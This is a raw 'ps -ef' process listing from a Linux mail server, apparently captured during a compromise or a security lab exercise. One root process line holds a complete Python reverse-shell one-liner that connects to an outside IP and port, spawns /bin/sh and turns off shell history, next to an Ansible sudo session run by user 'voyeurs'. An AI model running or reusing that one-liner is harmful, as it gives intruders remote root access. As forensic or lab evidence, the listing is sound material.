UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Oct23 ?        00:00:08 /sbin/init
root         2     0  0 Oct23 ?        00:00:00 [kthreadd]
root         3     2  0 Oct23 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 Oct23 ?        00:00:00 [kworker/0:0H]
root         7     2  0 Oct23 ?        00:00:03 [rcu_sched]
root         8     2  0 Oct23 ?        00:00:00 [rcu_bh]
root         9     2  0 Oct23 ?        00:00:00 [migration/0]
root        10     2  0 Oct23 ?        00:00:00 [watchdog/0]
root        11     2  0 Oct23 ?        00:00:00 [watchdog/1]
root        12     2  0 Oct23 ?        00:00:00 [migration/1]
root        13     2  0 Oct23 ?        00:00:00 [ksoftirqd/1]
root        15     2  0 Oct23 ?        00:00:00 [kworker/1:0H]
root        16     2  0 Oct23 ?        00:00:00 [watchdog/2]
root        17     2  0 Oct23 ?        00:00:00 [migration/2]
root        18     2  0 Oct23 ?        00:00:00 [ksoftirqd/2]
root        20     2  0 Oct23 ?        00:00:00 [kworker/2:0H]
root        21     2  0 Oct23 ?        00:00:00 [watchdog/3]
root        22     2  0 Oct23 ?        00:00:00 [migration/3]
root        23     2  0 Oct23 ?        00:00:00 [ksoftirqd/3]
root        25     2  0 Oct23 ?        00:00:00 [kworker/3:0H]
root        26     2  0 Oct23 ?        00:00:00 [kdevtmpfs]
root        27     2  0 Oct23 ?        00:00:00 [netns]
root        28     2  0 Oct23 ?        00:00:00 [perf]
root        29     2  0 Oct23 ?        00:00:00 [khungtaskd]
root        30     2  0 Oct23 ?        00:00:00 [writeback]
root        31     2  0 Oct23 ?        00:00:00 [ksmd]
root        32     2  0 Oct23 ?        00:00:00 [khugepaged]
root        33     2  0 Oct23 ?        00:00:00 [crypto]
root        34     2  0 Oct23 ?        00:00:00 [kintegrityd]
root        35     2  0 Oct23 ?        00:00:00 [bioset]
root        36     2  0 Oct23 ?        00:00:00 [kblockd]
root        37     2  0 Oct23 ?        00:00:00 [ata_sff]
root        38     2  0 Oct23 ?        00:00:00 [md]
root        39     2  0 Oct23 ?        00:00:00 [devfreq_wq]
root        45     2  0 Oct23 ?        00:00:00 [kswapd0]
root        46     2  0 Oct23 ?        00:00:00 [vmstat]
root        47     2  0 Oct23 ?        00:00:00 [fsnotify_mark]
root        48     2  0 Oct23 ?        00:00:00 [ecryptfs-kthrea]
root        64     2  0 Oct23 ?        00:00:00 [kthrotld]
root        65     2  0 Oct23 ?        00:00:00 [acpi_thermal_pm]
root        66     2  0 Oct23 ?        00:00:33 [vballoon]
root        67     2  0 Oct23 ?        00:00:00 [bioset]
root        68     2  0 Oct23 ?        00:00:00 [bioset]
root        69     2  0 Oct23 ?        00:00:00 [bioset]
root        70     2  0 Oct23 ?        00:00:00 [bioset]
root        71     2  0 Oct23 ?        00:00:00 [bioset]
root        72     2  0 Oct23 ?        00:00:00 [bioset]
root        73     2  0 Oct23 ?        00:00:00 [bioset]
root        74     2  0 Oct23 ?        00:00:00 [bioset]
root        75     2  0 Oct23 ?        00:00:00 [scsi_eh_0]
root        76     2  0 Oct23 ?        00:00:00 [scsi_tmf_0]
root        77     2  0 Oct23 ?        00:00:00 [scsi_eh_1]
root        78     2  0 Oct23 ?        00:00:00 [scsi_tmf_1]
root        84     2  0 Oct23 ?        00:00:00 [ipv6_addrconf]
root        97     2  0 Oct23 ?        00:00:00 [deferwq]
root        98     2  0 Oct23 ?        00:00:00 [charger_manager]
root        99     2  0 Oct23 ?        00:00:00 [bioset]
root       141     2  0 Oct23 ?        00:00:00 [bioset]
root       142     2  0 Oct23 ?        00:00:00 [bioset]
root       143     2  0 Oct23 ?        00:00:00 [bioset]
root       144     2  0 Oct23 ?        00:00:00 [bioset]
root       145     2  0 Oct23 ?        00:00:00 [bioset]
root       146     2  0 Oct23 ?        00:00:00 [bioset]
root       147     2  0 Oct23 ?        00:00:00 [bioset]
root       148     2  0 Oct23 ?        00:00:00 [bioset]
root       149     2  0 Oct23 ?        00:00:00 [scsi_eh_2]
root       150     2  0 Oct23 ?        00:00:00 [scsi_tmf_2]
root       151     2  0 Oct23 ?        00:00:00 [bioset]
root       154     2  0 Oct23 ?        00:00:00 [kpsmoused]
root       201     2  0 Oct23 ?        00:00:00 [ttm_swap]
root       488     2  0 Oct23 ?        00:00:00 [raid5wq]
root       513     2  0 Oct23 ?        00:00:00 [kdmflush]
root       514     2  0 Oct23 ?        00:00:00 [bioset]
root       522     2  0 Oct23 ?        00:00:00 [kdmflush]
root       524     2  0 Oct23 ?        00:00:00 [bioset]
root       537     2  0 Oct23 ?        00:00:00 [bioset]
root       557     2  0 Oct23 ?        00:00:00 [kworker/0:1H]
root       562     2  0 Oct23 ?        00:00:00 [kworker/3:1H]
root       563     2  0 Oct23 ?        00:00:00 [jbd2/dm-0-8]
root       564     2  0 Oct23 ?        00:00:00 [ext4-rsv-conver]
root       612     1  0 Oct23 ?        00:00:02 /lib/systemd/systemd-journald
root       631     2  0 Oct23 ?        00:00:00 [kauditd]
root       637     2  0 Oct23 ?        00:00:00 [iscsi_eh]
root       648     1  0 Oct23 ?        00:00:00 /sbin/lvmetad -f
root       658     2  0 Oct23 ?        00:00:00 [ib_addr]
root       662     2  0 Oct23 ?        00:00:00 [ib_mcast]
root       663     2  0 Oct23 ?        00:00:00 [ib_nl_sa_wq]
root       664     2  0 Oct23 ?        00:00:00 [ib_cm]
root       665     2  0 Oct23 ?        00:00:00 [iw_cm_wq]
root       666     2  0 Oct23 ?        00:00:00 [rdma_cm]
root       669     1  0 Oct23 ?        00:00:00 /lib/systemd/systemd-udevd
root       950     2  0 Oct23 ?        00:00:00 [ext4-rsv-conver]
root       951     2  0 Oct23 ?        00:00:00 [kworker/1:1H]
systemd+   983     1  0 Oct23 ?        00:00:00 /lib/systemd/systemd-timesyncd
root      1105     1  0 Oct23 ?        00:00:00 /usr/sbin/cron -f
root      1112     1  0 Oct23 ?        00:00:03 /usr/lib/accountsservice/accounts-daemon
root      1117     1  0 Oct23 ?        00:00:02 /usr/bin/lxcfs /var/lib/lxcfs/
root      1134     1  0 Oct23 ?        00:00:00 /usr/sbin/acpid
root      1138     1  0 Oct23 ?        00:00:00 /lib/systemd/systemd-logind
message+  1146     1  0 Oct23 ?        00:00:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root      1179     1  0 Oct23 ?        00:00:00 [scsi_eh_2]
syslog    1186     1  0 Oct23 ?        00:00:00 /usr/sbin/rsyslogd -n
root      1200     1  0 Oct23 ?        00:00:11 /usr/lib/snapd/snapd
root      1254     1  0 Oct23 ?        00:00:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root      1257     1  0 Oct23 ?        00:00:00 /usr/lib/policykit-1/polkitd --no-debug
root      1335     1  0 Oct23 ?        00:00:04 /sbin/iscsid
root      1336     1  0 Oct23 ?        00:00:22 /sbin/iscsid
root      1415     1  0 Oct23 ?        00:00:00 /usr/sbin/dovecot
root      1417     1  0 Oct23 ?        00:00:05 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root      1420     1  0 Oct23 tty1     00:00:00 /bin/login --
root      1545     1  0 Oct23 ?        00:00:01 /usr/lib/postfix/sbin/master
postfix   1547  1545  0 Oct23 ?        00:00:00 qmgr -l -t unix -u
dovecot   1557  1415  0 Oct23 ?        00:00:00 dovecot/anvil
root      1558  1415  0 Oct23 ?        00:00:00 dovecot/log
root      1561     2  0 Oct23 ?        00:00:00 [kworker/2:1H]
root      1597     1  0 Oct23 ?        00:00:00 [flush-253:0]
root      6532     1  0 09:11 ?        00:00:00 /lib/systemd/systemd --user
root      6534  6532  0 09:11 ?        00:00:00 (sd-pam)
root      6540  1420  0 09:11 tty1     00:00:00 -bash
postfix   7448  1545  0 12:56 ?        00:00:00 tlsmgr -l -t unix -u -c
root      8027     1  0 14:35 ?        00:00:01 sshd: root@pts/0
root      8064  8027  0 14:35 pts/0    00:00:00 -bash
root      8470     1  0 15:00 ?        00:00:00 [bioset]                
root      9334     2  0 15:14 ?        00:00:00 [kworker/1:0]
root     10392     1  0 15:27 ?        00:00:00 /usr/sbin/sshd -D
root     10493     2  0 15:35 ?        00:00:00 [kworker/2:2]
root     10949     2  0 15:39 ?        00:00:00 [kworker/1:1]
postfix  11093  1545  0 15:50 ?        00:00:00 pickup -l -t unix -u -c
root     12821     2  0 16:06 ?        00:00:00 [kworker/2:0]
root     13550     2  0 16:11 ?        00:00:00 [kworker/0:2]
root     13589     2  0 16:16 ?        00:00:00 [kworker/u8:0]
root     13621     2  0 16:18 ?        00:00:00 [kworker/3:3]
root     13681     2  0 16:34 ?        00:00:00 [kworker/0:0]
root     13799     2  0 16:34 ?        00:00:00 [kworker/3:0]
root     13929  1415  0 16:40 ?        00:00:00 dovecot/config
dovecot  13930  1415  0 16:40 ?        00:00:00 dovecot/auth
root     13933     2  0 16:40 ?        00:00:00 [kworker/u8:2]
root     13936     2  0 16:50 ?        00:00:00 [kworker/u8:1]
root     13937 10392  0 16:50 ?        00:00:00 sshd: voyeurs [priv]
voyeurs  13939     1  0 16:50 ?        00:00:00 /lib/systemd/systemd --user
root     13940     2  0 16:50 ?        00:00:00 [kworker/3:1]
voyeurs  13941 13939  0 16:50 ?        00:00:00 (sd-pam)
root     13942     2  0 16:50 ?        00:00:00 [kworker/0:1]
root     13951     1  0 16:50 ?        00:00:00 python -c import os; import pty; import socket; lhost = '10.150.100.183'; lport = 64203; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/sh'); s.close();
voyeurs  13979 13937  0 16:50 ?        00:00:00 sshd: voyeurs@pts/1
postfix  14000  1545  0 16:50 ?        00:00:00 cleanup -z -t unix -u -c
postfix  14001  1545  0 16:50 ?        00:00:00 trivial-rewrite -n rewrite -t unix -u -c
postfix  14002  1545  0 16:50 ?        00:00:00 local -t unix
voyeurs  14072 13979  0 16:51 pts/1    00:00:00 /bin/sh -c sudo -H -S -n -u root /bin/sh -c 'echo BECOME-SUCCESS-cjlfadtmepizpuetknebyywtajsjwcab; /usr/bin/python /home/voyeurs/.ansible/tmp/ansible-tmp-1572036665.5229957-266697776324288/AnsiballZ_command.py' && sleep 0
root     14073 14072  0 16:51 pts/1    00:00:00 sudo -H -S -n -u root /bin/sh -c echo BECOME-SUCCESS-cjlfadtmepizpuetknebyywtajsjwcab; /usr/bin/python /home/voyeurs/.ansible/tmp/ansible-tmp-1572036665.5229957-266697776324288/AnsiballZ_command.py
root     14077 14073  0 16:51 pts/1    00:00:00 /bin/sh -c echo BECOME-SUCCESS-cjlfadtmepizpuetknebyywtajsjwcab; /usr/bin/python /home/voyeurs/.ansible/tmp/ansible-tmp-1572036665.5229957-266697776324288/AnsiballZ_command.py
root     14078 14077  0 16:51 pts/1    00:00:00 /usr/bin/python /home/voyeurs/.ansible/tmp/ansible-tmp-1572036665.5229957-266697776324288/AnsiballZ_command.py
root     14080 14078  0 16:51 pts/1    00:00:00 /bin/sh -c ps -ef
root     14081 14080  0 16:51 pts/1    00:00:00 ps -ef